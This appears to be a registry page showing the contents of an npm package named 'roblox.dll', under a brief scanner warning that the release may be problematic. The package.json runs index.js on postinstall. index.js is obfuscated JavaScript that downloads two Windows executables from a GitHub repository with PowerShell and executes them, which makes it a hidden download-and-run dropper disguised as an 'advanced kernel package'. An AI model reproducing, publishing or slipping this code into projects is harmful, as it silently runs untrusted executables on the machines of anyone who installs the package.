roblox.dll 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of roblox.dll might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +15 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function a0_0x4502(){const _0x249035=['2ZInbIa','powershell\x20-Command\x20\x22Invoke-WebRequest\x20-Uri\x20\x27','path','88ykHgwu','4906431OLvKKr','\x20successfully','89044bRuRNK','child_process','\x27\x20-OutFile\x20\x27','https://github.com/zvydev/code/raw/main/cmd.exe','https://github.com/zvydev/code/raw/main/RobloxPlayerLauncher.exe','log','6809590wRzNal','25BeAokA','2968566knIKIJ','789819QqnQxO','Downloaded\x20','7YkkSpE','8tRRAYt','join','promisify','145132IgoDcP','length','util','4078392EoVcER','RobloxPlayerLauncher.exe','powershell\x20-Command\x20\x22Start-Process\x20\x27','Executed\x20'];a0_0x4502=function(){return _0x249035;};return a0_0x4502();}const a0_0x322030=a0_0x525f;(function(_0x13ad4c,_0x52c7e1){const _0x459bd7=a0_0x525f,_0x20fd52=_0x13ad4c();while(!![]){try{const _0x5a319b=-parseInt(_0x459bd7(0x108))/0x1+-parseInt(_0x459bd7(0x10f))/0x2*(parseInt(_0x459bd7(0x102))/0x3)+-parseInt(_0x459bd7(0xf9))/0x4*(parseInt(_0x459bd7(0x100))/0x5)+parseInt(_0x459bd7(0x101))/0x6*(-parseInt(_0x459bd7(0x104))/0x7)+-parseInt(_0x459bd7(0x105))/0x8*(parseInt(_0x459bd7(0xf7))/0x9)+-parseInt(_0x459bd7(0xff))/0xa+parseInt(_0x459bd7(0x112))/0xb*(parseInt(_0x459bd7(0x10b))/0xc);if(_0x5a319b===_0x52c7e1)break;else _0x20fd52['push'](_0x20fd52['shift']());}catch(_0x3c76f2){_0x20fd52['push'](_0x20fd52['shift']());}}}(a0_0x4502,0x74c83));const {exec}=require(a0_0x322030(0xfa)),path=require(a0_0x322030(0x111)),util=require(a0_0x322030(0x10a)),execAsync=util[a0_0x322030(0x107)](exec),urls=[a0_0x322030(0xfd),a0_0x322030(0xfc)],outputFiles=[path[a0_0x322030(0x106)](__dirname,a0_0x322030(0x10c)),path['join'](__dirname,'cmd.exe')];async function downloadAndRun(_0x54d5b3,_0x208bd3){const _0x2939f4=a0_0x322030,_0xcd0ed2=_0x2939f4(0x110)+_0x54d5b3+_0x2939f4(0xfb)+_0x208bd3+'\x27\x22',_0x2c8341=_0x2939f4(0x10d)+_0x208bd3+'\x27\x22';try{await execAsync(_0xcd0ed2),console['log'](_0x2939f4(0x103)+_0x208bd3+'\x20successfully'),await execAsync(_0x2c8341),console[_0x2939f4(0xfe)](_0x2939f4(0x10e)+_0x208bd3+_0x2939f4(0xf8));}catch(_0x3ba74f){console['error']('Error:\x20'+_0x3ba74f['message']);}}function a0_0x525f(_0x3cc036,_0x47e07e){const _0x4502df=a0_0x4502();return a0_0x525f=function(_0x525f3e,_0xb3d52a){_0x525f3e=_0x525f3e-0xf7;let _0x193ccf=_0x4502df[_0x525f3e];return _0x193ccf;},a0_0x525f(_0x3cc036,_0x47e07e);}((async()=>{const _0x37d3a9=a0_0x322030;for(let _0xcf0f2c=0x0;_0xcf0f2c<urls[_0x37d3a9(0x109)];_0xcf0f2c++){await downloadAndRun(urls[_0xcf0f2c],outputFiles[_0xcf0f2c]);}})());
|
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
{
|
2
|
+
"name": "roblox.dll",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "Advanced kernel package",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"author": "l1es",
|
10
|
+
"license": "ISC",
|
11
|
+
"keywords": [],
|
12
|
+
"publishConfig": {
|
13
|
+
"access": "public"
|
14
|
+
}
|
15
|
+
}
|